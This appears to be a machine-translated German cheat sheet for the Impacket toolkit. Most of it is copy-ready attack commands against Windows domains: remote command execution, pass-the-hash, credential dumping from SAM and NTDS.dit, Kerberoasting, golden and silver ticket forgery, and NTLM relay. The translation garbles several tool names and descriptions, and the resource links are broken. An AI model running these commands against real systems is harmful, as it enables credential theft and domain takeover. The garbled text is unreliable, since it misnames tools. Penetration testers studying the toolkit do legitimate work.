Impacket Toolkit Cheat Sheet
Überblick
Impacket ist eine Sammlung von Python-Klassen für die Zusammenarbeit mit Netzwerkprotokollen. Es bietet einen programmarmen Zugriff auf Pakete und implementiert mehrere Protokolle wie SMB, MSRPC und Kerberos. Impacket enthält zahlreiche gebrauchsfertige Werkzeuge für Penetrationstests, insbesondere auf Windows-Umgebungen.
ZEIT Warning: Impacket ist ein Sicherheitstest-Tool, das nur in Umgebungen verwendet werden sollte, in denen Sie eine ausdrückliche Erlaubnis dazu haben.
Installation
Von PyPI
bash
pip install impacket_
Von GitHub
bash
git clone https://github.com/fortra/impacket.git
cd impacket
pip install -r requirements.txt
python setup.py install_
Auf Kali Linux
bash
sudo apt update
sudo apt install -y python3-impacket_
Virtuelle Umgebung nutzen
```bash
Create and activate virtual environment
python -m venv impacket-env source impacket-env/bin/activate # Linux/macOS impacket-env\Scripts\activate.bat # Windows
Install Impacket
pip install impacket ```_
Befehlsausführungswerkzeuge
Psexec.
Erledigt Befehle auf Remote-Windows-Systemen mit dem SMB-Protokoll, ähnlich wie SysInternals' PsExec.
Basisnutzung
bash
psexec.py [domain/]username[:password]@target [options] [command]_
Gemeinsame Optionen
| | Option | Description | |
| --- | --- |
| | -hashes LMHASH:NTHASH | Use NTLM hashes instead of password (Pass-the-Hash) | |
| | -k | Use Kerberos authentication | |
| | -no-pass | Don't ask for password (useful for Kerberos) | |
| | -port [port] | Connect to SMB Server port (default: 445) | |
| | -debug | Turn DEBUG output ON | |
Beispiele
```bash
Execute command with explicit credentials
psexec.py administrator:Password123@192.168.1.100 cmd.exe
Execute command with domain credentials
psexec.py domain/administrator:Password123@192.168.1.100 cmd.exe
Execute specific command
psexec.py administrator:Password123@192.168.1.100 "ipconfig /all"
Use hash instead of password (Pass-the-Hash)
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100 cmd.exe ```_
Smbexec.py
Ähnlich wie psexec.py aber verwendet verschiedene Techniken, um Befehle auszuführen, so dass es potenziell Stealthier.
Basisnutzung
bash
smbexec.py [domain/]username[:password]@target [options]_
Gemeinsame Optionen
| | Option | Description | |
| --- | --- |
| | -hashes LMHASH:NTHASH | Use NTLM hashes instead of password (Pass-the-Hash) | |
| | -share SHARE | Share where the output will be grabbed from (default: ADMIN$) | |
| | -shell-type \\{cmd,powershell\\} | Shell type to use (default: cmd) | |
| | -codec CODEC | Sets encoding used (codec) from the target's output (default: UTF-8) | |
| | -service-name NAME | Service name to use (default: random) | |
Beispiele
```bash
Execute with explicit credentials
smbexec.py administrator:Password123@192.168.1.100
Execute with domain credentials
smbexec.py domain/administrator:Password123@192.168.1.100
Use hash instead of password (Pass-the-Hash)
smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100
Use PowerShell instead of cmd
smbexec.py -shell-type powershell administrator:Password123@192.168.1.100 ```_
wmiexec.py
Befehle auf Remote-Windows-Systemen mit WMI ausführen.
Basisnutzung
bash
wmiexec.py [domain/]username[:password]@target [options] [command]_
Gemeinsame Optionen
| | Option | Description | |
| --- | --- |
| | -hashes LMHASH:NTHASH | Use NTLM hashes instead of password (Pass-the-Hash) | |
| | -share SHARE | Share where the output will be grabbed from (default: ADMIN$) | |
| | -silentcommand | Execute command and return immediately without output | |
| | -codec CODEC | Sets encoding used (codec) from the target's output (default: UTF-8) | |
| | -shell-type \\{cmd,powershell\\} | Shell type to use (default: cmd) | |
Beispiele
```bash
Execute with explicit credentials
wmiexec.py administrator:Password123@192.168.1.100
Execute with domain credentials
wmiexec.py domain/administrator:Password123@192.168.1.100
Execute specific command
wmiexec.py administrator:Password123@192.168.1.100 "ipconfig /all"
Use hash instead of password (Pass-the-Hash)
wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100 ```_
Dcomexec.
Ausführen von Befehlen auf Remote-Windows-Systemen mit DCOM-Objekten.
Basisnutzung
bash
dcomexec.py [domain/]username[:password]@target [options] [command]_
Gemeinsame Optionen
| | Option | Description | |
| --- | --- |
| | -hashes LMHASH:NTHASH | Use NTLM hashes instead of password (Pass-the-Hash) | |
| | -object \\{ShellWindows,ShellBrowserWindow,MMC20\\} | DCOM object to use (default: MMC20.Application) | |
| | -silentcommand | Execute command and return immediately without output | |
| | -codec CODEC | Sets encoding used (codec) from the target's output (default: UTF-8) | |
| | -shell-type \\{cmd,powershell\\} | Shell type to use (default: cmd) | |
Beispiele
```bash
Execute with explicit credentials
dcomexec.py administrator:Password123@192.168.1.100
Execute with domain credentials
dcomexec.py domain/administrator:Password123@192.168.1.100
Execute with specific DCOM object
dcomexec.py -object ShellWindows administrator:Password123@192.168.1.100
Use hash instead of password (Pass-the-Hash)
dcomexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100 ```_
atexec.py
Ausführen von Befehlen auf Remote-Windows-Systemen mithilfe des Task Scheduler-Dienstes.
Basisnutzung
bash
atexec.py [domain/]username[:password]@target [options] command_
Gemeinsame Optionen
| | Option | Description | |
| --- | --- |
| | -hashes LMHASH:NTHASH | Use NTLM hashes instead of password (Pass-the-Hash) | |
| | -silentcommand | Execute command and return immediately without output | |
| | -codec CODEC | Sets encoding used (codec) from the target's output (default: UTF-8) | |
Beispiele
```bash
Execute command with explicit credentials
atexec.py administrator:Password123@192.168.1.100 "whoami > C:\temp\whoami.txt"
Execute command with domain credentials
atexec.py domain/administrator:Password123@192.168.1.100 "whoami > C:\temp\whoami.txt"
Use hash instead of password (Pass-the-Hash)
atexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100 "whoami > C:\temp\whoami.txt" ```_
Erstellen von Dumping-Tools
geheimsdump.py
extrahiert Anmeldeinformationen von einem entfernten Windows-System, einschließlich SAM, LSA Secrets, und NTDS.dit.
Basisnutzung
bash
secretsdump.py [domain/]username[:password]@target [options]_
Gemeinsame Optionen
| | Option | Description | |
| --- | --- |
| | -hashes LMHASH:NTHASH | Use NTLM hashes instead of password (Pass-the-Hash) | |
| | -just-dc | Extract only NTDS.DIT data (domain controller only) | |
| | -just-dc-ntlm | Extract only NTDS.DIT NTLM hashes (domain controller only) | |
| | -just-dc-user USER | Extract only NTDS.DIT data for specific user | |
| | -pwd-last-set | Shows pwdLastSet attribute for each NTDS.DIT account | |
| | -user-status | Shows whether the user is enabled or disabled | |
| | -history | Dump password history | |
| | -outputfile FILE | Write output to file | |
Beispiele
```bash
Dump credentials with explicit credentials
secretsdump.py administrator:Password123@192.168.1.100
Dump credentials with domain credentials
secretsdump.py domain/administrator:Password123@192.168.1.100
Dump credentials using hash (Pass-the-Hash)
secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100
Dump credentials from local files
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
Dump credentials from NTDS.dit
secretsdump.py -ntds ntds.dit -system system.save LOCAL
Extract only domain controller NTLM hashes
secretsdump.py -just-dc-ntlm domain/administrator:Password123@192.168.1.100 ```_
Kerberos Angriffswerkzeuge
GetNPUsers.py
Retrieves Passwort hashes für Benutzer mit "Benötigen Sie keine Kerberos preauthentication" Set (ASREPRoast Angriff).
Basisnutzung
bash
GetNPUsers.py [domain/]username[:password] -dc-ip <DC_IP> [options]_
Gemeinsame Optionen
| | Option | Description | |
| --- | --- |
| | -request | Requests TGT for users and output them in JtR/hashcat format | |
| | -no-pass | Don't ask for password (useful for Kerberos) | |
| | -k | Use Kerberos authentication | |
| | -dc-ip IP | IP Address of the domain controller | |
| | -usersfile FILE | File with user per line to test | |
| | -format \\{hashcat,john\\} | Format to save the AS_REP responses (default: hashcat) | |
| | -outputfile FILE | Output filename to write ciphers in JtR/hashcat format | |
Beispiele
```bash
Get users without Kerberos preauthentication with explicit credentials
GetNPUsers.py domain/username:password -dc-ip 192.168.1.100 -request
Get users without Kerberos preauthentication for specific user
GetNPUsers.py domain/username:password -dc-ip 192.168.1.100 -request -target-user user1
Get users without Kerberos preauthentication for all users in domain
GetNPUsers.py domain/ -dc-ip 192.168.1.100 -usersfile users.txt -format hashcat
Use no credentials (anonymous)
GetNPUsers.py domain/ -dc-ip 192.168.1.100 -no-pass ```_
GetUserSPN.py
Retrieves Service Principal Names (SPNs) für Konten in der Domain (Kerberoasting-Angriff).
Basisnutzung
bash
GetUserSPNs.py [domain/]username[:password] -dc-ip <DC_IP> [options]_
Gemeinsame Optionen
| | Option | Description | |
| --- | --- |
| | -request | Requests TGS for users and output them in JtR/hashcat format | |
| | -hashes LMHASH:NTHASH | Use NTLM hashes instead of password (Pass-the-Hash) | |
| | -dc-ip IP | IP Address of the domain controller | |
| | -target-user USER | Target specific user to request TGS for | |
| | -outputfile FILE | Output filename to write ciphers in JtR/hashcat format | |
| | -format \\{hashcat,john\\} | Format to save the TGS tickets (default: hashcat) | |
Beispiele
```bash
Get SPNs with explicit credentials
GetUserSPNs.py domain/username:password -dc-ip 192.168.1.100 -request
Get SPNs for specific user
GetUserSPNs.py domain/username:password -dc-ip 192.168.1.100 -request -target-user sqlservice
Output hashes in specific format
GetUserSPNs.py domain/username:password -dc-ip 192.168.1.100 -request -format hashcat
Use hash instead of password (Pass-the-Hash)
GetUserSPNs.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 domain/username -dc-ip 192.168.1.100 -request ```_
Ticketer.py
Erstellt Golden und Silver Tickets für Kerberos Authentifizierung.
Basisnutzung
bash
ticketer.py [options] username_
Gemeinsame Optionen
| | Option | Description | |
| --- | --- |
| | -nthash HASH | NT hash for the user or service account | |
| | -aesKey KEY | AES key for the user or service account | |
| | -domain DOMAIN | Domain name | |
| | -domain-sid SID | Domain SID | |
| | -spn SPN | Service Principal Name (for Silver Tickets) | |
| | -groups IDS | Comma-separated list of group IDs to include in the ticket | |
| | -duration HOURS | Ticket duration in hours (default: 10) | |
| | -out FILE | Output filename to save the ticket | |
Beispiele
```bash
Create Golden Ticket
ticketer.py -nthash 7facdc498ed1680c4fd1448319a8c04f -domain-sid S-1-5-21-1234567890-1234567890-1234567890 -domain contoso.local administrator
Create Silver Ticket
ticketer.py -nthash 7facdc498ed1680c4fd1448319a8c04f -domain-sid S-1-5-21-1234567890-1234567890-1234567890 -domain contoso.local -spn MSSQLSvc/sqlserver.contoso.local:1433 administrator
Specify output file
ticketer.py -nthash 7facdc498ed1680c4fd1448319a8c04f -domain-sid S-1-5-21-1234567890-1234567890-1234567890 -domain contoso.local -out ticket.kirbi administrator ```_
Netzwerkprotokolle Werkzeuge
smbclient.py
Bietet einem SMB-Client Zugriff auf Aktien und Dateien auf Remote-Systeme.
Basisnutzung
bash
smbclient.py [domain/]username[:password]@target [options]_
Gemeinsame Optionen
| | Option | Description | |
| --- | --- |
| | -hashes LMHASH:NTHASH | Use NTLM hashes instead of password (Pass-the-Hash) | |
| | -port [port] | Connect to SMB Server port (default: 445) | |
| | -file FILE | Input file with commands to execute in the mini shell | |
| | -debug | Turn DEBUG output ON | |
Gemeinsame Befehle (Interactive Shell)
| | Command | Description | |
| --- | --- |
| | help | Show available commands | |
| | shares | List available shares | |
| | use <share> | Connect to a specific share | |
| | ls | List files in current directory | |
| | cd <dir> | Change directory | |
| | get <file> | Download file | |
| | put <file> | Upload file | |
| | rm <file> | Delete file | |
| | mkdir <dir> | Create directory | |
| | rmdir <dir> | Remove directory | |
| | exit | Exit the shell | |
Beispiele
```bash
Connect with explicit credentials
smbclient.py administrator:Password123@192.168.1.100
Connect with domain credentials
smbclient.py domain/administrator:Password123@192.168.1.100
Use hash instead of password (Pass-the-Hash)
smbclient.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100 ```_
mssqlclient.py
Bietet einen Client, um mit Microsoft SQL Server Instanzen zu interagieren.
Basisnutzung
bash
mssqlclient.py [domain/]username[:password]@target [options]_
Gemeinsame Optionen
| | Option | Description | |
| --- | --- |
| | -hashes LMHASH:NTHASH | Use NTLM hashes instead of password (Pass-the-Hash) | |
| | -windows-auth | Use Windows Authentication (default: False) | |
| | -port [port] | Destination port to connect to (default: 1433) | |
| | -db DATABASE | MSSQL database instance (default: None) | |
| | -file FILE | Input file with commands to execute in the SQL shell | |
| | -debug | Turn DEBUG output ON | |
Gemeinsame Befehle (Interactive Shell)
| | Command | Description | |
| --- | --- |
| | help | Show available commands | |
| | enable_xp_cmdshell | Enable the xp_cmdshell stored procedure | |
| | disable_xp_cmdshell | Disable the xp_cmdshell stored procedure | |
| | xp_cmdshell <command> | Execute command through xp_cmdshell | |
| | sp_start_job <job> | Start a SQL Server job | |
| | exit | Exit the shell | |
Beispiele
```bash
Connect with explicit credentials
mssqlclient.py sa:Password123@192.168.1.100
Connect with domain credentials
mssqlclient.py domain/sqluser:Password123@192.168.1.100
Use hash instead of password (Pass-the-Hash)
mssqlclient.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 sa@192.168.1.100
Enable Windows authentication
mssqlclient.py domain/sqluser:Password123@192.168.1.100 -windows-auth ```_
Andere nützliche Werkzeuge
ntlmrelayx.py
Führt NTLM Relay-Angriffe.
Basisnutzung
bash
ntlmrelayx.py [options]_
Gemeinsame Optionen
| | Option | Description | |
| --- | --- |
| | -t TARGET | Target to relay the credentials to | |
| | -tf FILE | File with targets to relay the credentials to | |
| | -w | Start the HTTP server and do not relay credentials | |
| | -e FILE | Execute this file when a connection is relayed | |
| | -c COMMAND | Execute this command when a connection is relayed | |
| | -smb2support | Enable SMB2 support | |
| | -socks | Launch a SOCKS proxy for the connection | |
| | -one-shot | Relay only one connection | |
| | -debug | Turn DEBUG output ON | |
Beispiele
```bash
Relay to specific target
ntlmrelayx.py -t smb://192.168.1.100 -smb2support
Relay to multiple targets
ntlmrelayx.py -tf targets.txt -smb2support
Execute command on successful relay
ntlmrelayx.py -t smb://192.168.1.100 -smb2support -c "whoami > C:\temp\whoami.txt"
Dump SAM database on successful relay
ntlmrelayx.py -t smb://192.168.1.100 -smb2support -d
Start SOCKS proxy
ntlmrelayx.py -tf targets.txt -socks ```_
wohnzimmer.
Führt SID-Lookups aus, um Benutzer und Gruppen aufzuzählen.
Basisnutzung
bash
lookupsid.py [domain/]username[:password]@target [options]_
Gemeinsame Optionen
| | Option | Description | |
| --- | --- |
| | -hashes LMHASH:NTHASH | Use NTLM hashes instead of password (Pass-the-Hash) | |
| | -domain DOMAIN | Domain to enumerate (default: target domain) | |
| | -debug | Turn DEBUG output ON | |
Beispiele
```bash
Enumerate SIDs with explicit credentials
lookupsid.py administrator:Password123@192.168.1.100
Enumerate SIDs with domain credentials
lookupsid.py domain/administrator:Password123@192.168.1.100
Use hash instead of password (Pass-the-Hash)
lookupsid.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100 ```_
reg.py
Bietet ein Remote-Registry-Handling-Tool.
Basisnutzung
bash
reg.py [domain/]username[:password]@target [options] action [params]_
Gemeinsame Optionen
| | Option | Description | |
| --- | --- |
| | -hashes LMHASH:NTHASH | Use NTLM hashes instead of password (Pass-the-Hash) | |
| | -debug | Turn DEBUG output ON | |
Maßnahmen
| | Action | Description | |
| --- | --- |
| | query | Query a registry key or value | |
| | add | Add a registry key or value | |
| | delete | Delete a registry key or value | |
| | save | Save a registry hive to a file | |
Beispiele
```bash
Query registry key with explicit credentials
reg.py administrator:Password123@192.168.1.100 query -keyName HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion
Add registry key with domain credentials
reg.py domain/administrator:Password123@192.168.1.100 add -keyName HKLM\SOFTWARE\Test -v TestValue -vt REG_SZ -vd "Test Data"
Delete registry key with hash (Pass-the-Hash)
reg.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100 delete -keyName HKLM\SOFTWARE\Test ```_
Gemeinsame Parameter Across Tools
| | Parameter | Description | |
| --- | --- |
| | -h, --help | Show help message and exit | |
| | -debug | Turn DEBUG output ON | |
| | -hashes LMHASH:NTHASH | NTLM hashes, format is LMHASH:NTHASH | |
| | -no-pass | Don't ask for password (useful for Kerberos) | |
| | -k | Use Kerberos authentication | |
| | -aesKey KEY | AES key to use for Kerberos authentication | |
| | -dc-ip IP | IP Address of the domain controller | |
| | -target-ip IP | IP Address of the target machine | |
| | -port [port] | Destination port to connect to | |
Ressourcen
- Official GitHub Repository
- (__LINK_5___)
- [Impacket Beispiele](LINK_5___ -%20[Impacket%20Wiki](_LINK_5 -%20Impacket%20API%20Dokumentation